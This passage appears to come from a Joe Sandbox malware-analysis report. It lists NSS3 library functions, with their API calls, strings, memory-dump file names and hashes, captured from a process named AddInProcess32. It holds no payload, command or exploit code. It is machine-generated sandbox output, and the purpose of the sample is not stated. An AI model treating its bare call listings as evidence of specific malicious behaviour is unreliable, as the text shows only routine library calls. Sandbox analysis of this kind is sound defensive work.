                                                                                      • PR_Lock.NSS3 ref: 6CCD0D68
                                                                                      • PR_LogPrint.NSS3(PR_Counter: Deleting RName: %s, %p,?,?), ref: 6CCD0D83
                                                                                      • PR_LogPrint.NSS3(PR_Counter: Deleting unused QName: %s, %p,?,?), ref: 6CCD0DC6
                                                                                      • PR_Unlock.NSS3 ref: 6CCD0DEA
                                                                                      Strings
                                                                                      • PR_Counter: Deleting RName: %s, %p, xrefs: 6CCD0D7E
                                                                                      • PR_Counter: Deleting: QName: %s, RName: %s, xrefs: 6CCD0D55
                                                                                      • PR_Counter: Deleting unused QName: %s, %p, xrefs: 6CCD0DC1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Print$___swprintf_l$CriticalCurrentEnterExplodeInitLockR_vsmprintfR_vsnprintfSectionThreadTimeUnlock
                                                                                      • String ID: PR_Counter: Deleting RName: %s, %p$PR_Counter: Deleting unused QName: %s, %p$PR_Counter: Deleting: QName: %s, RName: %s
                                                                                      • API String ID: 472264942-749320930
                                                                                      • Opcode ID: e7982d0f9009b953113da88c423c4f1b8e123876c80357b0d2174fa8d2423f45
                                                                                      • Instruction ID: bf26f797199aec78d76762c9b6f2a25309b9db23d68c726d8aa1f395ca371a04
                                                                                      • Opcode Fuzzy Hash: e7982d0f9009b953113da88c423c4f1b8e123876c80357b0d2174fa8d2423f45
                                                                                      • Instruction Fuzzy Hash: F8215E71101206AFE710DF58D980C92B7F9FF4A318354856AE65987B10EB31F858CBA1
                                                                                      APIs
                                                                                      • PORT_Alloc_Util.NSS3(?,00000000,?,?,?,00000000), ref: 6CD10C84
                                                                                        • Part of subcall function 6CD1C68C: PR_Malloc.NSS3(00000001,?,?,6CD1BB9B,?,?,6CCDCAF2,?,6CD16CFC,?,?,00000000,?,?,00000000), ref: 6CD1C6A6
                                                                                        • Part of subcall function 6CD1C68C: PR_SetError.NSS3(FFFFE013,00000000,?,?,6CD1BB9B,?,?,6CCDCAF2,?,6CD16CFC,?,?,00000000,?,?,00000000), ref: 6CD1C6BA
                                                                                      • PORT_Free_Util.NSS3(?), ref: 6CD10D73
                                                                                      • PORT_SetError_Util.NSS3(00000000,00000000,?), ref: 6CD10D7F
                                                                                      • PK11_DoesMechanism.NSS3(00000000,?), ref: 6CD10DA7
                                                                                      • PK11_GetBestSlot.NSS3(?,?), ref: 6CD10DD3
                                                                                      • PORT_SetError_Util.NSS3(FFFFE013,00000000,?,?,?,00000000), ref: 6CD10C96
                                                                                        • Part of subcall function 6CD1CB04: PR_SetError.NSS3(?,00000000,?,6CCDC9C2,FFFFE007,00000000,?,00000000), ref: 6CD1CB0C
                                                                                      • PORT_Free_Util.NSS3(?,00000000,00000000,?), ref: 6CD10D16
                                                                                      • PORT_SetError_Util.NSS3(00000000,00000000,?,00000000,00000000,?), ref: 6CD10D22
                                                                                      • PORT_SetError_Util.NSS3(FFFFE040), ref: 6CD10DE5
                                                                                      • PORT_Free_Util.NSS3(?,FFFFE040), ref: 6CD10DED
                                                                                      • PK11_FreeSlot.NSS3(00000000,00000000,?,00000004,?,?,?,00000000,?), ref: 6CD10E21
                                                                                      • PORT_Free_Util.NSS3(?), ref: 6CD10E2C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Util$Error_Free_$K11_$ErrorSlot$Alloc_BestDoesFreeMallocMechanism
                                                                                      • String ID:
                                                                                      • API String ID: 3990154601-0
                                                                                      • Opcode ID: accb61509cacbd520b9a53b71abd24d4afdabd32962b59e797a0edf706676477
                                                                                      • Instruction ID: 5ce1fceba9ec4fcbe382a3134c436059761d120956ff9adc581ea06aeb2da3ad
                                                                                      • Opcode Fuzzy Hash: accb61509cacbd520b9a53b71abd24d4afdabd32962b59e797a0edf706676477
                                                                                      • Instruction Fuzzy Hash: 70518171608205EFDF01AFA5EC40AEE77B9FF44358F154129F814A6E60EB35E924CB60
                                                                                      APIs
                                                                                      • SECMOD_GetDefaultModuleListLock.NSS3 ref: 6CD11E5C
                                                                                      • PORT_SetError_Util.NSS3(FFFFE09A), ref: 6CD11E6D
                                                                                        • Part of subcall function 6CD1CB04: PR_SetError.NSS3(?,00000000,?,6CCDC9C2,FFFFE007,00000000,?,00000000), ref: 6CD1CB0C
                                                                                      • SECMOD_GetReadLock.NSS3(?,00000000,00000000,00000000), ref: 6CD11EAD
                                                                                      • SECMOD_GetDefaultModuleList.NSS3(00000000,00000000,00000000), ref: 6CD11EB3
                                                                                      • SECMOD_ReleaseReadLock.NSS3(?,00000000,00000000,00000000), ref: 6CD11F73
                                                                                      • PK11_FreeSlotList.NSS3(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 6CD11F80
                                                                                      • PK11_FreeSlotList.NSS3(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 6CD11F8D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: List$Lock$DefaultFreeK11_ModuleReadSlot$ErrorError_ReleaseUtil
                                                                                      • String ID:
                                                                                      • API String ID: 2407333104-0
                                                                                      • Opcode ID: e24dd9d259befb4b17254cd4b60d838586bac49db1c26cb0884d6513e61c5378
                                                                                      • Instruction ID: bebf086b35804968c727d07e09160bdaddd28c0b642abd404292d9120727ddf6
                                                                                      • Opcode Fuzzy Hash: e24dd9d259befb4b17254cd4b60d838586bac49db1c26cb0884d6513e61c5378
                                                                                      • Instruction Fuzzy Hash: 3041B37290C219EBCF14DFA9FC40A9E7BF5AF55318F204129E414ABE71EB35C4458BA0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2f0889e67469cc9487f6030a45da30cf5eb3264933787890ecacf646f9a54c8b
                                                                                      • Instruction ID: f12ce6cb90f5231e63c8e68093a949899e744575198eebf51e3992cee00c04f9
                                                                                      • Opcode Fuzzy Hash: 2f0889e67469cc9487f6030a45da30cf5eb3264933787890ecacf646f9a54c8b
                                                                                      • Instruction Fuzzy Hash: 4731FE71508605EEEB10DFE5DC80A9A77F9EF4032CF20063DEE65A6FB0EB7959059620
                                                                                      APIs
                                                                                      • PR_Now.NSS3 ref: 6CCE4FD5
                                                                                      • PK11_FindCertFromNickname.NSS3(?,00000000), ref: 6CCE4FEB
                                                                                      • CERT_FindCertByNickname.NSS3(?,?), ref: 6CCE4FFE
                                                                                      • CERT_DestroyCertificate.NSS3(00000000), ref: 6CCE5029
                                                                                      • CERT_CheckCertValidTimes.NSS3(00000000,00000000,?,00000000), ref: 6CCE5040
                                                                                      • CERT_IsUserCert.NSS3(00000000), ref: 6CCE5067
                                                                                      • CERT_CreateSubjectCertList.NSS3(00000000,?,00000054,00000000,?,00000000), ref: 6CCE507F
                                                                                      • CERT_FilterCertListForUserCerts.NSS3(00000000,00000000,?,00000054,00000000,?,00000000), ref: 6CCE5087
                                                                                      • CERT_DestroyCertificate.NSS3(00000000,00000000,00000000,?,00000054,00000000,?,00000000), ref: 6CCE508D
                                                                                      • CERT_FilterCertListByUsage.NSS3(00000000,?,00000000), ref: 6CCE50A0
                                                                                      • CERT_DupCertificate.NSS3(?), ref: 6CCE50B5
                                                                                      • CERT_DestroyCertList.NSS3(00000000), ref: 6CCE50BE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Cert$List$CertificateDestroy$FilterFindNicknameUser$CertsCheckCreateFromK11_SubjectTimesUsageValid
                                                                                      • String ID:
                                                                                      • API String ID: 2649647668-0
                                                                                      • Opcode ID: b2017d4ce6ad7dfe055c49a52e1d9fcc596d7d75850b732438db707f8f15139e
                                                                                      • Instruction ID: 124520e0a17f59e59f62111c39167f0f426977baf6ed0912950b2869533e430c
                                                                                      • Opcode Fuzzy Hash: b2017d4ce6ad7dfe055c49a52e1d9fcc596d7d75850b732438db707f8f15139e
                                                                                      • Instruction Fuzzy Hash: 693147329052167BEB215E659C40FEF3BA8DF0B7ACF110015FD0496A90FB21D91287E1
                                                                                      APIs
                                                                                      • PR_CallOnce.NSS3(6CD89340,6CCEEAFC,?,6CD400B4,6CD3FF00,00000000), ref: 6CCEDD71
                                                                                      • PR_Lock.NSS3(?,6CD3FF00,00000000), ref: 6CCEDD8F
                                                                                      • NSS_IsInitialized.NSS3(6CD3FF00,00000000), ref: 6CCEDD92
                                                                                      • PR_Unlock.NSS3(6CD3FF00,00000000), ref: 6CCEDDA1
                                                                                      • PORT_SetError_Util.NSS3(FFFFE09A), ref: 6CCEDDAC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: CallError_InitializedLockOnceUnlockUtil
                                                                                      • String ID:
                                                                                      • API String ID: 2346938989-0
                                                                                      • Opcode ID: 1d5e358462bf6ae2404cb5c88c24c0824563d20e4189728992c8ddef9e79ba14
                                                                                      • Instruction ID: 265582b67073aa8353ef6af3ae4f7120cc9cde2c86e926d76cebfdfc35980af2
                                                                                      • Opcode Fuzzy Hash: 1d5e358462bf6ae2404cb5c88c24c0824563d20e4189728992c8ddef9e79ba14
                                                                                      • Instruction Fuzzy Hash: E331E9317162059BEF055F6AEC058557BBCFB8B378328422EEB6583AE0EB319811CA50
                                                                                      APIs
                                                                                      • sqlite3_malloc.NSS3(?), ref: 6CC9CA30
                                                                                      • sqlite3_free.NSS3(?), ref: 6CC9CAE8
                                                                                      • sqlite3_result_error_code.NSS3(?,00000000), ref: 6CC9CB03
                                                                                      • sqlite3_free.NSS3(00000000,?,00000000), ref: 6CC9CB09
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: sqlite3_free$sqlite3_mallocsqlite3_result_error_code
                                                                                      • String ID: %d %d %d %d
                                                                                      • API String ID: 192389764-2566208650
                                                                                      • Opcode ID: d74e00fd0542c1097e2798698cb45f6a8f8198407f862bc6b77cba85cf7a55d9
                                                                                      • Instruction ID: 60d225eb24b8991386f242594e0f5df92e17a36a94bac346c0c20ce74aeda61a
                                                                                      • Opcode Fuzzy Hash: d74e00fd0542c1097e2798698cb45f6a8f8198407f862bc6b77cba85cf7a55d9
                                                                                      • Instruction Fuzzy Hash: 1BA17B71E002189FDB10DFA9CD80EDEBBB9FF09314F24416AE918AB651EB309945CF50
                                                                                      APIs
                                                                                      • PR_Calloc.NSS3(00000001,-00000003,?,?), ref: 6CCDADA5
                                                                                      • PR_NewMonitor.NSS3(?,?,?), ref: 6CCDADC9
                                                                                      Strings
                                                                                      • expanded monitor cache to %d (buckets %d), xrefs: 6CCDAF00
                                                                                      • unable to grow monitor cache hash buckets, xrefs: 6CCDAE69
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: CallocMonitor
                                                                                      • String ID: expanded monitor cache to %d (buckets %d)$unable to grow monitor cache hash buckets
                                                                                      • API String ID: 1135341003-592109405
                                                                                      • Opcode ID: d04e147028aea0d7b11276e72910fe6563aa35995b52413f76061cc91710a99d
                                                                                      • Instruction ID: d0eef494cba3b0cf8b792ab7502f2e45d49eccb9aac77349ec79e08ce9cda823
                                                                                      • Opcode Fuzzy Hash: d04e147028aea0d7b11276e72910fe6563aa35995b52413f76061cc91710a99d
                                                                                      • Instruction Fuzzy Hash: 1041FA717122069FEB04CF69C48065AB7F8FBC6328B61426ADA56D7B80FB31F815CB51
                                                                                      APIs
                                                                                      • PK11_NeedUserInit.NSS3(00000001,00000000,00000001,00000000,6CD121CC,?,6CCFAAC7,00000001,?,?,6CD121CC,00000000,00000000,00000000,?,6CD121CC), ref: 6CCFAC96
                                                                                        • Part of subcall function 6CD13093: PK11_GetTokenInfo.NSS3(00000001,?,00000001), ref: 6CD130BE
                                                                                      • PK11_IsLoggedIn.NSS3(00000001,00000000,00000000,00000001,00000000,6CD121CC,?,6CCFAAC7,00000001,?,?,6CD121CC,00000000,00000000,00000000), ref: 6CCFACAD
                                                                                      • PORT_SetError_Util.NSS3(FFFFE00F,00000000,00000001,00000000,6CD121CC,?,6CCFAAC7,00000001,?,?,6CD121CC,00000000,00000000,00000000,?,6CD121CC), ref: 6CCFADB6
                                                                                        • Part of subcall function 6CD1CB04: PR_SetError.NSS3(?,00000000,?,6CCDC9C2,FFFFE007,00000000,?,00000000), ref: 6CD1CB0C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: K11_$ErrorError_InfoInitLoggedNeedTokenUserUtil
                                                                                      • String ID: AUTH$RETRY
                                                                                      • API String ID: 1914951913-2400511389
                                                                                      • Opcode ID: dba5a5c3d946e124f5e470863dc797e83f2352eccd52442b0b8dbfa0999ed09e
                                                                                      • Instruction ID: 17a979f7645a49c02f77560731c36203c8bb19ca1f8dfb6eb45d80c171cd774e
                                                                                      • Opcode Fuzzy Hash: dba5a5c3d946e124f5e470863dc797e83f2352eccd52442b0b8dbfa0999ed09e
                                                                                      • Instruction Fuzzy Hash: 8E314C313081156BDB555B6A9C40BEAB7B8EFC67A9F2041ADF97196E91FB20C9038370
                                                                                      APIs
                                                                                      • PR_Now.NSS3(00000000,00000000,00000000,?,6CCE5E16,00000000,?,00000000,00000000), ref: 6CCE5CD4
                                                                                      • CERT_CheckCertValidTimes.NSS3(?,00000000,?,?,6CCE5E16,00000000,?,00000000,00000000), ref: 6CCE5CE0
                                                                                        • Part of subcall function 6CCDD629: PORT_SetError_Util.NSS3(FFFFE005), ref: 6CCDD63B
                                                                                      • PORT_Strdup_Util.NSS3(?,00000000), ref: 6CCE5CF7
                                                                                        • Part of subcall function 6CD1CB23: PORT_Alloc_Util.NSS3(00000002,?,00000000,?,6CCDDCE9,00000000,?,00000000), ref: 6CD1CB3B
                                                                                        • Part of subcall function 6CD1CB23: memcpy.VCRUNTIME140(00000000,00000000,00000002,?,00000000,?,6CCDDCE9,00000000,?,00000000), ref: 6CD1CB4C
                                                                                      • PORT_ArenaStrdup_Util.NSS3(?,?,00000000), ref: 6CCE5D01
                                                                                      • PR_smprintf.NSS3(%s%s,?,?,00000000), ref: 6CCE5D1F
                                                                                      • PR_smprintf.NSS3(6CD51024,(NULL) (Validity Unknown),00000000), ref: 6CCE5D3E
                                                                                      • PORT_ArenaStrdup_Util.NSS3(00000000,00000000), ref: 6CCE5D56
                                                                                      • PORT_Free_Util.NSS3(00000000,00000000,00000000), ref: 6CCE5D5E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Util$Strdup_$ArenaR_smprintf$Alloc_CertCheckError_Free_TimesValidmemcpy
                                                                                      • String ID: %s%s$(NULL) (Validity Unknown)
                                                                                      • API String ID: 973219689-112662406
                                                                                      • Opcode ID: e839fd4b8b1ae7533d2d75c1a3aa1c9e98b09e97b1330c9fc0960cde2a3362f2
                                                                                      • Instruction ID: 47ab3b656d5b35eb7b518571bb60ff0ee893df067f7a08b512d8e39fac953f24
                                                                                      • Opcode Fuzzy Hash: e839fd4b8b1ae7533d2d75c1a3aa1c9e98b09e97b1330c9fc0960cde2a3362f2
                                                                                      • Instruction Fuzzy Hash: 99115932408214EBDB121B6ADD0CACA3BB8EF8B759F1440A2F81895E20F7318A54C1A1
                                                                                      APIs
                                                                                      • PORT_NewArena_Util.NSS3(00000800,00000003,?,FFFFE001), ref: 6CD07CB4
                                                                                        • Part of subcall function 6CD1CA68: PR_SetError.NSS3(FFFFE013,00000000,?,6CCE3237,00000800,?,?,6CCDCC16,00000000,?,?,?,?,?,6CCDC216,?), ref: 6CD1CA7B
                                                                                      • PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000003), ref: 6CD07EDC
                                                                                        • Part of subcall function 6CD0EDE1: memset.VCRUNTIME140(?,00000000,?,?,?,?,?,?,?,00000000,?,6CCFE5A8,00000000,00000001), ref: 6CD0EE45
                                                                                        • Part of subcall function 6CD0EDE1: PORT_Free_Util.NSS3(?,?,00000000,?,?,?,?,?,?,?,00000000,?,6CCFE5A8,00000000,00000001), ref: 6CD0EE4D
                                                                                        • Part of subcall function 6CD0EDE1: PR_Lock.NSS3(?,00000000,00001002,?), ref: 6CD0EE6E
                                                                                        • Part of subcall function 6CD0EDE1: PR_Unlock.NSS3(?), ref: 6CD0EEA7
                                                                                        • Part of subcall function 6CD0EDE1: PORT_Free_Util.NSS3(EB2BE856,?,?,?), ref: 6CD0EEC3
                                                                                        • Part of subcall function 6CD0EDE1: PK11_FreeSlot.NSS3(D611683D,00000000,?,?,00000000,?,6CCFE5A8,00000000,00000001), ref: 6CD0EECC
                                                                                      • PK11_FreeSymKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000003), ref: 6CD07EE7
                                                                                      • SECITEM_FreeItem_Util.NSS3(00000000,00000001), ref: 6CD07EF4
                                                                                      • SECITEM_FreeItem_Util.NSS3(?,00000001), ref: 6CD07F05
                                                                                      • SECITEM_FreeItem_Util.NSS3(00000003,00000001), ref: 6CD07F16
                                                                                      • PORT_FreeArena_Util.NSS3(6CD0791D,00000000,?,?,?,?,?,?,?,00000003,?,FFFFE001), ref: 6CD07F22
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: FreeUtil$Item_K11_$Arena_Free_$ErrorLockSlotUnlockmemset
                                                                                      • String ID:
                                                                                      • API String ID: 1101186054-0
                                                                                      • Opcode ID: ef1ccf69a841005200a21e218f4c362164676d131845bcdd759d70ec43436363
                                                                                      • Instruction ID: dea73aac1d543bc98f9703e775c37fd33d2a5aa262335480b289a7cd94c058d4
                                                                                      • Opcode Fuzzy Hash: ef1ccf69a841005200a21e218f4c362164676d131845bcdd759d70ec43436363
                                                                                      • Instruction Fuzzy Hash: A781A472E04209BFDF119F98DC41BEE7BB5EF04324F210129F914BAAA0EB719D5497A4
                                                                                      APIs
                                                                                      • sqlite3_mutex_enter.NSS3(00000000,6CCA9D3C,00000000,?,00000000,?,00000000,?,?,6CC74621,?,00000001,00000000,?,?,6CCA9C66), ref: 6CCB8A29
                                                                                      • sqlite3_mutex_leave.NSS3(00000000,6CCA9D3C,00000000,?,00000000,?,00000000,?,?,6CC74621,?,00000001,00000000,?,?,6CCA9C66), ref: 6CCB8A71
                                                                                      • sqlite3_mutex_enter.NSS3(6CCA9D3C,00000000,?,00000000,?,00000000,?,?,6CC74621,?,00000001,00000000,?,?,6CCA9C66,?), ref: 6CCB8A85
                                                                                      • memset.VCRUNTIME140(6CD88380,00000000,0000005C,00000000,?,00000000,?,00000000,?,?,6CC74621,?,00000001,00000000,?), ref: 6CCB8AB5
                                                                                      • sqlite3_config.NSS3(00000012,6CD5193C,6CC8C693,?,6CCAC4DC,?,6CD539E4,00000001), ref: 6CCB8AF9
                                                                                      • sqlite3_malloc.NSS3(0000000A,6CC8C693,?,6CCAC4DC,?,6CD539E4,00000001), ref: 6CCB8B20
                                                                                      • sqlite3_mutex_leave.NSS3(00000000,?,00000000,?,00000000,?,?,6CC74621,?,00000001,00000000,?,?,6CCA9C66,?,?), ref: 6CCB8B9A
                                                                                      • sqlite3_mutex_enter.NSS3(00000000,00000000,?,00000000,?,00000000,?,?,6CC74621,?,00000001,00000000,?,?,6CCA9C66,?), ref: 6CCB8BA0
                                                                                      • sqlite3_mutex_free.NSS3(?,00000000,?,00000000,?,?,6CC74621,?,00000001,00000000,?,?,6CCA9C66,?,?,00000001), ref: 6CCB8BBC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: sqlite3_mutex_enter$sqlite3_mutex_leave$memsetsqlite3_configsqlite3_mallocsqlite3_mutex_free
                                                                                      • String ID:
                                                                                      • API String ID: 4196095344-0
                                                                                      • Opcode ID: e5efc47cde31f37da92bf25ef5af94698710e523826ed7ade42f4dcc0487429e
                                                                                      • Instruction ID: 699f107e732668a75cd696b229c2d8e5a6d604db7f05376c90f1a494ab5211a1
                                                                                      • Opcode Fuzzy Hash: e5efc47cde31f37da92bf25ef5af94698710e523826ed7ade42f4dcc0487429e
                                                                                      • Instruction Fuzzy Hash: D84144B1A762139EFF11BBB59D44E5D36B8E703779B14012AD210EAE44F770844686D1
                                                                                      APIs
                                                                                      • PORT_SetError_Util.NSS3(FFFFE007,00000000,?,00000000), ref: 6CCDC9BD
                                                                                      • PL_strncasecmp.NSS3(oid.,?,00000004,?,00000000,?,00000000), ref: 6CCDCA4C
                                                                                      • isdigit.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,00000000,?,00000000), ref: 6CCDCA5D
                                                                                      • PL_strcasecmp.NSS3(6CD5E970,?,?,?,?,00000000,?,00000000), ref: 6CCDCA7F
                                                                                      • SECOID_FindOIDByTag_Util.NSS3(00000029,?,?,?,00000000,?,00000000), ref: 6CCDCAA4
                                                                                      • SEC_StringToOID.NSS3(?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 6CCDCAED
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
